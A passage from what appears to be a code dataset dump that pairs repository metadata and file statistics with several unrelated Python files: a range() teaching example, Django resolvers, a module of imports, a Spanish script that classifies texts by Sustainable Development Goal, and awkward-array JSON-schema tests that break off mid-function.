| 18.454545 | 49 | 0.684729 | 49 | 406 | 5.632653 | 0.306122 | 0.235507 | 0.344203 | 0.471014 | 0.23913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.197044 | 406 | 21 | 50 | 19.333333 | 0.846626 | 0 | 0 | 0 | 0 | 0 | 0.174026 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | false | 0 | 0.090909 | 0.454545 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
b725747cb86bfce405372a7dcf9cfacab5911af7 | 260 | py | Python | chapter09/example06.py | YordanIH/Intro_to_CS_w_Python | eebbb8efd7ef0d07be9bc45b6b1e8f20737ce01a | [
"MIT"
] | null | null | null | chapter09/example06.py | YordanIH/Intro_to_CS_w_Python | eebbb8efd7ef0d07be9bc45b6b1e8f20737ce01a | [
"MIT"
] | null | null | null | chapter09/example06.py | YordanIH/Intro_to_CS_w_Python | eebbb8efd7ef0d07be9bc45b6b1e8f20737ce01a | [
"MIT"
] | null | null | null | #Using the function range, setting the step size
# Two-argument form: start is inclusive, stop is exclusive.
print(list(range(1,5)))
print(list(range(1,10)))
print(list(range(5,10)))
# Three-argument form adds a step size.
print(list(range(2000, 2050, 4)))
# A negative step counts downward (start > stop).
print(list(range(2500, 2000, -4)))
# A negative step with start < stop yields an empty range.
print(list(range(2000, 2050, -4)))
print(list(range(2050, 2000, 4))) | 32.5 | 48 | 0.696154 | 47 | 260 | 3.851064 | 0.340426 | 0.348066 | 0.541436 | 0.248619 | 0.40884 | 0.40884 | 0.40884 | 0.40884 | 0.40884 | 0 | 0 | 0.184874 | 0.084615 | 260 | 8 | 49 | 32.5 | 0.57563 | 0.180769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
b72b6414128d7532285b9517574b04d22a6d2a53 | 91 | py | Python | saefportal/restapi/views/__init__.py | harry-consulting/SAEF1 | 055d6e492ba76f90e3248b9da2985fdfe0c6b430 | [
"BSD-2-Clause"
] | null | null | null | saefportal/restapi/views/__init__.py | harry-consulting/SAEF1 | 055d6e492ba76f90e3248b9da2985fdfe0c6b430 | [
"BSD-2-Clause"
] | null | null | null | saefportal/restapi/views/__init__.py | harry-consulting/SAEF1 | 055d6e492ba76f90e3248b9da2985fdfe0c6b430 | [
"BSD-2-Clause"
] | 1 | 2020-12-16T15:02:52.000Z | 2020-12-16T15:02:52.000Z | from .root_view import *
from .list_retrieve_views import *
from .procedure_views import *
| 22.75 | 34 | 0.802198 | 13 | 91 | 5.307692 | 0.615385 | 0.289855 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131868 | 91 | 3 | 35 | 30.333333 | 0.873418 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b778e43a7e9b8bbdf12b9209a4906e1acf682742 | 200 | py | Python | server/contests/status/resolvers.py | jauhararifin/ugrade | c5bc0ce3920534cf289c739ffe8b83ceed9f52e8 | [
"MIT"
] | 15 | 2019-02-27T19:28:23.000Z | 2019-07-20T17:54:46.000Z | server/contests/status/resolvers.py | jauhararifin/ugrade | c5bc0ce3920534cf289c739ffe8b83ceed9f52e8 | [
"MIT"
] | 9 | 2020-09-04T18:30:56.000Z | 2022-03-25T18:41:11.000Z | server/contests/status/resolvers.py | jauhararifin/ugrade | c5bc0ce3920534cf289c739ffe8b83ceed9f52e8 | [
"MIT"
] | 2 | 2019-03-29T14:15:47.000Z | 2019-04-12T06:08:11.000Z | import datetime
from django.utils import timezone
def ping_resolver(_root, _info) -> str:
    """Health-check resolver: always answers 'pong'."""
    return 'pong'
def server_clock_resolver(_root, _info) -> datetime.datetime:
    """Report the server's current time via django.utils.timezone."""
    now = timezone.now()
    return now
| 18.181818 | 61 | 0.745 | 26 | 200 | 5.461538 | 0.653846 | 0.169014 | 0.225352 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 200 | 10 | 62 | 20 | 0.845238 | 0 | 0 | 0 | 0 | 0 | 0.02 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
b7c54502f926c588c0a895b338f87e9acce47bdf | 127 | py | Python | mobie/htm/__init__.py | platybrowser/mmb-core | d48e9b4781de479ad19e1523630e310575a2fd84 | [
"MIT"
] | 1 | 2020-03-03T01:33:06.000Z | 2020-03-03T01:33:06.000Z | mobie/htm/__init__.py | platybrowser/mmb-core | d48e9b4781de479ad19e1523630e310575a2fd84 | [
"MIT"
] | 4 | 2020-05-15T09:27:59.000Z | 2020-05-29T19:15:00.000Z | mobie/htm/__init__.py | platybrowser/mmb-core | d48e9b4781de479ad19e1523630e310575a2fd84 | [
"MIT"
] | 2 | 2020-06-08T07:06:01.000Z | 2020-06-08T07:08:08.000Z | from .data_import import add_images, add_segmentations
from .grid_views import add_plate_grid_view, get_merged_plate_grid_view
| 42.333333 | 71 | 0.889764 | 21 | 127 | 4.857143 | 0.571429 | 0.176471 | 0.254902 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07874 | 127 | 2 | 72 | 63.5 | 0.871795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b7f5c520d9c9b3c85fdb382a08456fdc98508327 | 19,207 | py | Python | Lenguaje natural/text_ods_token.py | DubanTorres/Analisis-Scrapping-Convocatorias-Clacso | 0a4f397a3e5275973bb627f2f85eac76fb53030a | [
"BSD-3-Clause"
] | null | null | null | Lenguaje natural/text_ods_token.py | DubanTorres/Analisis-Scrapping-Convocatorias-Clacso | 0a4f397a3e5275973bb627f2f85eac76fb53030a | [
"BSD-3-Clause"
] | null | null | null | Lenguaje natural/text_ods_token.py | DubanTorres/Analisis-Scrapping-Convocatorias-Clacso | 0a4f397a3e5275973bb627f2f85eac76fb53030a | [
"BSD-3-Clause"
] | 1 | 2021-10-04T14:28:40.000Z | 2021-10-04T14:28:40.000Z | import pandas as pd
import os
"""
Prepara Archivos
"""
textos = os.listdir('/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/2. Textos Geneales')
bdd = pd.read_csv('/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/Latam3.csv')
bdd = bdd.loc[bdd['Tipo convocatoria'] == 'Investigación-Innovación']
"""
Tokens español
"""
gramas_esp = pd.read_csv('/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/Gramas_final.csv')
# Convierte ods en lista
# Canonicalise the Spanish ODS labels: lower-case each cell, split
# multi-label cells on ';' (after mapping ':' to ';'), and collapse known
# misspellings/truncations into one canonical label per SDG.
class_ods_esp = []
for list_osd in gramas_esp['ODS']:
list_osd = list_osd.lower().replace(':', ';').split(';')
list_osd2 = []
for o in list_osd:
if o == 'rabajo decente y crecimiento económico' or o == 'trabajo decente y crecimiento económico' or o == 'trabajo decente y crecimiento económic':
o = 'trabajo decente y crecimiento económico'
if o == 'igualdad de género' or o == 'gualdad de género' or o == 'igualdad de genero':
o = 'igualdad de género'
if o == 'industria, innovación e infraestructuras' or o == 'industria, innovación e infraestructura':
o = 'industria, innovación e infraestructuras'
if o == 'paz, justicia e instituciones solidas' or o == 'paz, justicia e instituciones sólidas' or o == 'paz, justicia e instituciones sólida':
o = 'paz, justicia e instituciones sólidas'
if 'producción y consumo' in o:
o = 'producción y consumo responsable'
# NOTE(review): the last two alternatives below are the same string —
# one of them was probably meant to be a different variant.
if o == 'ciudades y comunidades sostenibles' or o == 'ciudades y comunidades sostenible' or o == 'ciudades y comunidades sostenible':
o = 'ciudades y comunidades sostenibles'
if o == 'alianzas para lograr los objetivos' or o == 'alianza para lograr los objetivos':
o = 'alianza para lograr los objetivos'
if o == 'reducción de desigualdade' or o == 'reducción de las desigualdades' or o == 'reducción de desigualdades':
o = 'reducción de desigualdades'
if o == 'vida de ecosistemas terrestres' or o == 'vida de ecosistemas terrestre':
o = 'vida de ecosistemas terrestres'
o = o.strip()
list_osd2.append(o)
class_ods_esp.append(list_osd2)
gramas_esp['ODS'] = class_ods_esp
"""
Tokens portugues
"""
gramas_por = pd.read_csv('/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/Gramas_protugues.csv')
# convierte Ods en lista
class_ods_por = []
for list_osd in gramas_por['ODS']:
list_osd = list_osd.lower().split(';')
list_osd2 = []
for o in list_osd:
if o == 'rabajo decente y crecimiento económico' or o == 'trabajo decente y crecimiento económico' or o == 'trabajo decente y crecimiento económic':
o = 'trabajo decente y crecimiento económico'
if o == 'igualdad de género' or o == 'gualdad de género' or o == 'igualdad de genero':
o = 'igualdad de género'
if o == 'industria, innovación e infraestructuras' or o == 'industria, innovación e infraestructura':
o = 'industria, innovación e infraestructuras'
if o == 'paz, justicia e instituciones solidas' or o == 'paz, justicia e instituciones sólidas' or o == 'paz, justicia e instituciones sólida':
o = 'paz, justicia e instituciones sólidas'
if 'producción y consumo' in o:
o = 'producción y consumo responsable'
if o == 'ciudades y comunidades sostenibles' or o == 'ciudades y comunidades sostenible' or o == 'ciudades y comunidades sostenible':
o = 'ciudades y comunidades sostenibles'
if o == 'alianzas para lograr los objetivos' or o == 'alianza para lograr los objetivos':
o = 'alianza para lograr los objetivos'
if o == 'reducción de desigualdade' or o == 'reducción de las desigualdades' or o == 'reducción de desigualdades':
o = 'reducción de desigualdades'
if o == 'vida de ecosistemas terrestres' or o == 'vida de ecosistemas terrestre':
o = 'vida de ecosistemas terrestres'
o = o.strip()
list_osd2.append(o.lower())
class_ods_por.append(list_osd2)
gramas_por['ODS'] = class_ods_por
"""
Elimina las tildes
"""
def normalize(s):
replacements = (
("á", "a"),
("é", "e"),
("í", "i"),
("ó", "o"),
("ú", "u"),
("Á", "A"),
("É", "E"),
("Í", "I"),
("Ó", "O"),
("Ú", "U")
)
for a, b in replacements:
s = s.replace(a, b)
return s
"""
Crea matriz de tokens en textos
"""
txt_inv = bdd['ID Proyecto'].tolist()
entidad = bdd['País'].tolist()
entidad.index('Brasil')
gramas_esp = gramas_esp[gramas_esp['ODS'].isnull() == False]
path_base = '/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/2. Textos Geneales'
# matriz = pd.read_csv('/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/Matriz_Clasificación_ODS.csv')
matriz = pd.DataFrame()
# Main pass.  For every document: read the text, strip accents, split it on
# '.', and look each word up in the ODS token table — the Spanish table for
# every country except 'Brasil', the Portuguese table for Brasil.  Each
# match appends the containing sentence to that SDG's text buffer and bumps
# its counter.  One row per document is appended to `matriz`, and the CSV
# checkpoint is rewritten after every document.
# NOTE: a sentence is appended once per matching word occurrence, so the
# same sentence can appear several times in a buffer.
n = 0
for i in txt_inv:
# Progress: percentage processed and running document count.
n+=1
print(str(n * 100 / len(txt_inv)))
print(n)
# NOTE(review): this file handle is never closed — a `with open(...)`
# block would avoid the leak.
txt = open(path_base + '/' + i , 'r')
txt = str(normalize(txt.read())).replace('\n', ' ').split('.')
## Va Palabra por palabra
"""
Define variables por ODS
"""
# Per-SDG accumulators: matched-sentence text and a match counter.
pobreza = ''
pobreza_num= 0
hambre = ''
hambre_num = 0
salud = ''
salud_num = 0
educacion = ''
educacion_num = 0
genero = ''
genero_num = 0
agua = ''
agua_num = 0
energia = ''
energia_num = 0
trabajo = ''
trabajo_num = 0
industria = ''
industria_num = 0
desigualdades = ''
desigualdades_num = 0
sostenibles = ''
sostenibles_num = 0
producción_consumo = ''
producción_consumo_num = 0
clima = ''
clima_num = 0
submarina = ''
submarina_num = 0
terrestres = ''
terrestres_num = 0
paz = ''
paz_num = 0
alianza = ''
alianza_num = 0
# Non-Brazilian documents: match against the Spanish token table.
if entidad[txt_inv.index(i)] != 'Brasil':
for t in range(len(txt)):
i_split = txt[t].split()
for grama in i_split:
grama = str(grama).lower()
if grama in gramas_esp['Gramas'].tolist() and grama.isalpha() and grama.isdigit() == False:
for id_token in range(len(gramas_esp)):
if grama == gramas_esp['Gramas'][id_token]:
if 'educación de calidad' in gramas_esp['ODS'][id_token]:
educacion = educacion + txt[t]+ '\n'
educacion_num +=1
if 'fin de la pobreza' in gramas_esp['ODS'][id_token]:
pobreza = pobreza + txt[t]+'\n'
pobreza_num +=1
if 'salud y bienestar' in gramas_esp['ODS'][id_token]:
salud = salud + txt[t]+'\n'
salud_num +=1
if 'igualdad de género' in gramas_esp['ODS'][id_token]:
genero = genero + txt[t]+'\n'
genero_num +=1
if 'agua limpia y saneamiento' in gramas_esp['ODS'][id_token]:
agua = agua + txt[t]+'\n'
agua_num +=1
if 'energía asequible y no contaminante' in gramas_esp['ODS'][id_token]:
energia = energia + txt[t]+'\n'
energia_num +=1
if 'trabajo decente y crecimiento económico' in gramas_esp['ODS'][id_token]:
trabajo = trabajo + txt[t]+'\n'
trabajo_num +=1
if 'industria, innovación e infraestructuras' in gramas_esp['ODS'][id_token]:
industria = industria + txt[t]+'\n'
industria_num+=1
if 'reducción de desigualdades' in gramas_esp['ODS'][id_token]:
desigualdades = desigualdades + txt[t]+'\n'
desigualdades_num +=1
if 'ciudades y comunidades sostenibles' in gramas_esp['ODS'][id_token]:
sostenibles = sostenibles + txt[t]+'\n'
sostenibles_num +=1
if 'producción y consumo responsable' in gramas_esp['ODS'][id_token]:
producción_consumo = producción_consumo + txt[t]+'\n'
producción_consumo_num +=1
if 'acción por el clima' in gramas_esp['ODS'][id_token]:
clima = clima + txt[t]+'\n'
clima_num +=1
if 'vida submarina' in gramas_esp['ODS'][id_token]:
submarina = submarina + txt[t]+'\n'
submarina_num +=1
if 'vida de ecosistemas terrestres' in gramas_esp['ODS'][id_token]:
terrestres = terrestres + txt[t]+'\n'
terrestres_num +=1
if 'paz, justicia e instituciones sólidas' in gramas_esp['ODS'][id_token]:
paz = paz + txt[t]+'\n'
paz_num +=1
if 'alianza para lograr los objetivos' in gramas_esp['ODS'][id_token]:
alianza = alianza + txt[t]+'\n'
alianza_num+=1
if 'hambre cero' in gramas_esp['ODS'][id_token]:
hambre = hambre + txt[t]+'\n'
hambre_num+=1
else:
continue
# One output row per document: a count column and a TXT column per SDG.
registro = pd.DataFrame()
registro['ID Documento'] = [i]
registro['Fin de la pobreza'] = [pobreza_num]
registro['TXT Fin de la pobreza'] = [pobreza]
registro['Hambre cero'] = [hambre_num]
registro['TXT Hambre cero'] = [hambre]
registro['Salud y bienestar'] = [salud_num]
registro['TXT Salud y bienestar'] = [salud]
registro['Educación de calidad'] = [educacion_num]
registro['TXT Educación de calidad'] = [educacion]
registro['Igualdad de género'] = [genero_num]
registro['TXT Igualdad de género'] = [genero]
registro['Agua limpia y saneamiento'] = [agua_num]
registro['TXT Agua limpia y saneamiento'] = [agua]
registro['Energía asequible y no contaminante'] = [energia_num]
registro['TXT Energía asequible y no contaminante'] = [energia]
registro['Trabajo decente y crecimiento económico'] = [trabajo_num]
registro['TXT Trabajo decente y crecimiento económico'] = [trabajo]
registro['Industria, innovación e infraestructuras'] = [industria_num]
registro['TXT Industria, innovación e infraestructuras'] = [industria]
registro['Reducción de desigualdades'] = [desigualdades_num]
registro['TXT Reducción de desigualdades'] = [desigualdades]
registro['Ciudades y comunidades sostenibles'] = [sostenibles_num]
registro['TXT Ciudades y comunidades sostenibles'] = [sostenibles]
registro['Producción y consumo responsable'] = [producción_consumo_num]
registro['TXT Producción y consumo responsable'] = [producción_consumo]
registro['Acción por el clima'] = [clima_num]
registro['TXT Acción por el clima'] = [clima]
registro['Vida submarina'] = [submarina_num]
registro['TXT Vida submarina'] = [submarina]
registro['Vida de ecosistemas terrestres'] = [terrestres_num]
registro['TXT Vida de ecosistemas terrestres'] = [terrestres]
registro['Paz, justicia e instituciones sólidas'] = [paz_num]
registro['TXT Paz, justicia e instituciones sólidas'] = [paz]
registro['Alianza para lograr los objetivos'] = [alianza_num]
registro['TXT Alianza para lograr los objetivos'] = [alianza]
# Checkpoint after every document so progress survives interruptions.
matriz = pd.concat([matriz, registro])
matriz = matriz.reset_index(drop=True)
matriz.to_csv('/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/Matriz_Clasificación_ODS.csv')
# Brazilian documents: same matching, driven by the Portuguese table.
else:
for t in range(len(txt)):
i_split = txt[t].split()
for grama in i_split:
grama = str(grama).lower()
if grama.lower() in gramas_por['Gramas'].tolist():
for id_token in range(len(gramas_por)):
if grama.lower() == gramas_por['Gramas'][id_token] and grama.isalpha() and grama.isdigit() == False:
if 'educación de calidad' in gramas_por['ODS'][id_token]:
educacion = educacion + txt[t]+ '\n'
educacion_num +=1
if 'fin de la pobreza' in gramas_por['ODS'][id_token]:
pobreza = pobreza + txt[t]+'\n'
pobreza_num +=1
if 'salud y bienestar' in gramas_por['ODS'][id_token]:
salud = salud + txt[t]+'\n'
salud_num +=1
if 'igualdad de género' in gramas_por['ODS'][id_token]:
genero = genero + txt[t]+'\n'
genero_num +=1
if 'agua limpia y saneamiento' in gramas_por['ODS'][id_token]:
agua = agua + txt[t]+'\n'
agua_num +=1
if 'energía asequible y no contaminante' in gramas_por['ODS'][id_token]:
energia = energia + txt[t]+'\n'
energia_num +=1
if 'trabajo decente y crecimiento económico' in gramas_por['ODS'][id_token]:
trabajo = trabajo + txt[t]+'\n'
trabajo_num +=1
if 'industria, innovación e infraestructuras' in gramas_por['ODS'][id_token]:
industria = industria + txt[t]+'\n'
industria_num+=1
if 'reducción de desigualdades' in gramas_por['ODS'][id_token]:
desigualdades = desigualdades + txt[t]+'\n'
desigualdades_num +=1
if 'ciudades y comunidades sostenibles' in gramas_por['ODS'][id_token]:
sostenibles = sostenibles + txt[t]+'\n'
sostenibles_num +=1
if 'producción y consumo responsable' in gramas_por['ODS'][id_token]:
producción_consumo = producción_consumo + txt[t]+'\n'
producción_consumo_num +=1
if 'acción por el clima' in gramas_por['ODS'][id_token]:
clima = clima + txt[t]+'\n'
clima_num +=1
if 'vida submarina' in gramas_por['ODS'][id_token]:
submarina = submarina + txt[t]+'\n'
submarina_num +=1
if 'vida de ecosistemas terrestres' in gramas_por['ODS'][id_token]:
terrestres = terrestres + txt[t]+'\n'
terrestres_num +=1
if 'paz, justicia e instituciones sólidas' in gramas_por['ODS'][id_token]:
paz = paz + txt[t]+'\n'
paz_num +=1
if 'alianza para lograr los objetivos' in gramas_por['ODS'][id_token]:
alianza = alianza + txt[t]+'\n'
alianza_num+=1
if 'hambre cero' in gramas_por['ODS'][id_token]:
hambre = hambre + txt[t]+'\n'
hambre_num+=1
else:
continue
#elif gramas_esp['ODS'][id_token].lower() == 'hambre cero':
# Same per-document row construction and CSV checkpoint as above.
registro = pd.DataFrame()
registro['ID Documento'] = [i]
registro['Fin de la pobreza'] = [pobreza_num]
registro['TXT Fin de la pobreza'] = [pobreza]
registro['Hambre cero'] = [hambre_num]
registro['TXT Hambre cero'] = [hambre]
registro['Salud y bienestar'] = [salud_num]
registro['TXT Salud y bienestar'] = [salud]
registro['Educación de calidad'] = [educacion_num]
registro['TXT Educación de calidad'] = [educacion]
registro['Igualdad de género'] = [genero_num]
registro['TXT Igualdad de género'] = [genero]
registro['Agua limpia y saneamiento'] = [agua_num]
registro['TXT Agua limpia y saneamiento'] = [agua]
registro['Energía asequible y no contaminante'] = [energia_num]
registro['TXT Energía asequible y no contaminante'] = [energia]
registro['Trabajo decente y crecimiento económico'] = [trabajo_num]
registro['TXT Trabajo decente y crecimiento económico'] = [trabajo]
registro['Industria, innovación e infraestructuras'] = [industria_num]
registro['TXT Industria, innovación e infraestructuras'] = [industria]
registro['Reducción de desigualdades'] = [desigualdades_num]
registro['TXT Reducción de desigualdades'] = [desigualdades]
registro['Ciudades y comunidades sostenibles'] = [sostenibles_num]
registro['TXT Ciudades y comunidades sostenibles'] = [sostenibles]
registro['Producción y consumo responsable'] = [producción_consumo_num]
registro['TXT Producción y consumo responsable'] = [producción_consumo]
registro['Acción por el clima'] = [clima_num]
registro['TXT Acción por el clima'] = [clima]
registro['Vida submarina'] = [submarina_num]
registro['TXT Vida submarina'] = [submarina]
registro['Vida de ecosistemas terrestres'] = [terrestres_num]
registro['TXT Vida de ecosistemas terrestres'] = [terrestres]
registro['Paz, justicia e instituciones sólidas'] = [paz_num]
registro['TXT Paz, justicia e instituciones sólidas'] = [paz]
registro['Alianza para lograr los objetivos'] = [alianza_num]
registro['TXT Alianza para lograr los objetivos'] = [alianza]
matriz = pd.concat([matriz, registro])
matriz = matriz.reset_index(drop=True)
matriz.to_csv('/home/duban/Workspace/Analisis-Scrapping-Convocatorias-Clacso/data/Matriz_Clasificación_ODS.csv')
| 41.936681 | 156 | 0.535482 | 2,040 | 19,207 | 4.925 | 0.089706 | 0.027172 | 0.034836 | 0.025082 | 0.882652 | 0.877177 | 0.857072 | 0.838957 | 0.838957 | 0.838957 | 0 | 0.005258 | 0.35638 | 19,207 | 457 | 157 | 42.028446 | 0.807475 | 0.012808 | 0 | 0.62037 | 0 | 0.006173 | 0.303653 | 0.031899 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003086 | false | 0 | 0.006173 | 0 | 0.012346 | 0.006173 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4d9d058b791729fe54eb8a0937a4891fca972ce5 | 9,460 | py | Python | tests/v2/test_1162-ak-from_json_schema.py | BioGeek/awkward-1.0 | 0cfb4e43c41d5c7d9830cc7b1d750485c0a93eb2 | [
"BSD-3-Clause"
] | null | null | null | tests/v2/test_1162-ak-from_json_schema.py | BioGeek/awkward-1.0 | 0cfb4e43c41d5c7d9830cc7b1d750485c0a93eb2 | [
"BSD-3-Clause"
] | null | null | null | tests/v2/test_1162-ak-from_json_schema.py | BioGeek/awkward-1.0 | 0cfb4e43c41d5c7d9830cc7b1d750485c0a93eb2 | [
"BSD-3-Clause"
] | null | null | null | # BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE
from __future__ import absolute_import
import pytest # noqa: F401
import numpy as np # noqa: F401
import awkward as ak # noqa: F401
def test_boolean():
    """Boolean schema: whitespace-laden input and an empty array both parse."""
    parse = ak._v2.operations.convert.from_json_schema
    filled = parse(
        " [ true ,false, true, true, false] ",
        {"items": {"type": "boolean"}, "type": "array"},
    )
    assert filled.tolist() == [True, False, True, True, False]

    empty = parse("[]", {"items": {"type": "boolean"}, "type": "array"})
    assert empty.tolist() == []
def test_integer():
    """Whole-valued numbers (even "3.0") satisfy an integer schema as int64."""
    from_json_schema = ak._v2.operations.convert.from_json_schema

    def schema():
        return {"type": "array", "items": {"type": "integer"}}

    array = from_json_schema(" [ 1 ,2 ,3.0, 4, 5] \n ", schema())
    assert array.tolist() == [1, 2, 3, 4, 5]
    assert str(array.type) == "5 * int64"

    empty = from_json_schema("[ ]", schema())
    assert empty.tolist() == []
    assert str(empty.type) == "0 * int64"
def test_number():
    """A "number" item type yields float64 output."""
    array = ak._v2.operations.convert.from_json_schema(
        " [ 1 ,2,3.14, 4, 5]",
        {"type": "array", "items": {"type": "number"}},
    )
    assert array.tolist() == [1, 2, 3.14, 4, 5]
    assert str(array.type) == "5 * float64"
def test_option_boolean():
    """A ["boolean", "null"] union maps JSON null to a missing value (?bool)."""
    array = ak._v2.operations.convert.from_json_schema(
        " [ true ,false ,null , true, false]",
        {"type": "array", "items": {"type": ["boolean", "null"]}},
    )
    assert array.tolist() == [True, False, None, True, False]
    assert str(array.type) == "5 * ?bool"
def test_option_integer():
    """null inside an integer/null union becomes None; the type stays ?int64."""
    from_json_schema = ak._v2.operations.convert.from_json_schema

    def schema():
        return {"type": "array", "items": {"type": ["null", "integer"]}}

    array = from_json_schema(" [ 1 ,2,null,4, 5]", schema())
    assert array.tolist() == [1, 2, None, 4, 5]
    assert str(array.type) == "5 * ?int64"

    empty = from_json_schema(" [ ]", schema())
    assert empty.tolist() == []
    assert str(empty.type) == "0 * ?int64"
def test_string():
    """JSON string escapes (unicode, quote, newline) are decoded correctly."""
    from_json_schema = ak._v2.operations.convert.from_json_schema

    def schema():
        return {"type": "array", "items": {"type": "string"}}

    array = from_json_schema(
        r' [ "" ,"two","three \u2192 3", "\"four\"", "fi\nve"]', schema()
    )
    assert array.tolist() == ["", "two", "three \u2192 3", '"four"', "fi\nve"]

    empty = from_json_schema(r"[]", schema())
    assert empty.tolist() == []
def test_option_string():
    """Nullable strings: null becomes None while escapes still decode."""
    from_json_schema = ak._v2.operations.convert.from_json_schema

    def schema():
        return {"type": "array", "items": {"type": ["null", "string"]}}

    array = from_json_schema(
        r' [ "" ,null ,"three \u2192 3", "\"four\"", "fi\nve"]', schema()
    )
    assert array.tolist() == ["", None, "three \u2192 3", '"four"', "fi\nve"]

    empty = from_json_schema(r"[]", schema())
    assert empty.tolist() == []
def test_enum_string():
    """A string enum is materialized as an IndexedArray into the category list."""
    array = ak._v2.operations.convert.from_json_schema(
        r'["three", "two", "one", "one", "two", "three"]',
        {"type": "array", "items": {"type": "string", "enum": ["one", "two", "three"]}},
    )
    assert array.tolist() == ["three", "two", "one", "one", "two", "three"]
    # Index values point into the enum ["one", "two", "three"].
    assert isinstance(array.layout, ak._v2.contents.IndexedArray)
    assert array.layout.index.data.tolist() == [2, 1, 0, 0, 1, 2]
def test_option_enum_string():
    """A nullable enum uses IndexedOptionArray; null entries get index -1."""
    array = ak._v2.operations.convert.from_json_schema(
        r'["three", "two", null, "one", "one", "two", "three"]',
        {
            "type": "array",
            "items": {"type": ["null", "string"], "enum": ["one", "two", "three"]},
        },
    )
    assert array.tolist() == ["three", "two", None, "one", "one", "two", "three"]
    assert isinstance(array.layout, ak._v2.contents.IndexedOptionArray)
    assert array.layout.index.data.tolist() == [2, 1, -1, 0, 0, 1, 2]
def test_array_integer():
    """Nested integer arrays become a variable-length dimension."""
    from_json_schema = ak._v2.operations.convert.from_json_schema

    def schema():
        return {"type": "array", "items": {"type": "array", "items": {"type": "integer"}}}

    array = from_json_schema(" [ [ 1 ,2, 3], [], [4, 5]]", schema())
    assert array.tolist() == [[1, 2, 3], [], [4, 5]]
    assert str(array.type) == "3 * var * int64"

    empty = from_json_schema("[]", schema())
    assert empty.tolist() == []
def test_regulararray_integer():
    """minItems == maxItems pins the inner dimension to a regular size."""
    inner = {
        "type": "array",
        "items": {"type": "integer"},
        "minItems": 3,
        "maxItems": 3,
    }
    array = ak._v2.operations.convert.from_json_schema(
        "[[1, 2, 3], [4, 5, 6]]", {"type": "array", "items": inner}
    )
    assert array.tolist() == [[1, 2, 3], [4, 5, 6]]
    assert str(array.type) == "2 * 3 * int64"
def test_option_regulararray_integer():
    """A nullable fixed-size list type prints as option[3 * int64]."""
    inner = {
        "type": ["array", "null"],
        "items": {"type": "integer"},
        "minItems": 3,
        "maxItems": 3,
    }
    array = ak._v2.operations.convert.from_json_schema(
        "[[1, 2, 3], null, [4, 5, 6]]", {"type": "array", "items": inner}
    )
    assert array.tolist() == [[1, 2, 3], None, [4, 5, 6]]
    assert str(array.type) == "3 * option[3 * int64]"
def test_option_array_integer():
    """Nullable variable-length lists of integers."""
    from_json_schema = ak._v2.operations.convert.from_json_schema

    def schema():
        return {
            "type": "array",
            "items": {"type": ["null", "array"], "items": {"type": "integer"}},
        }

    array = from_json_schema(" [ [ 1 ,2,3 ],null,[ ], [4, 5]]", schema())
    assert array.tolist() == [[1, 2, 3], None, [], [4, 5]]
    assert str(array.type) == "4 * option[var * int64]"

    empty = from_json_schema("[]", schema())
    assert empty.tolist() == []
def test_option_array_option_integer():
    """Both the lists and their items may independently be null."""
    from_json_schema = ak._v2.operations.convert.from_json_schema

    def schema():
        return {
            "type": "array",
            "items": {
                "type": ["null", "array"],
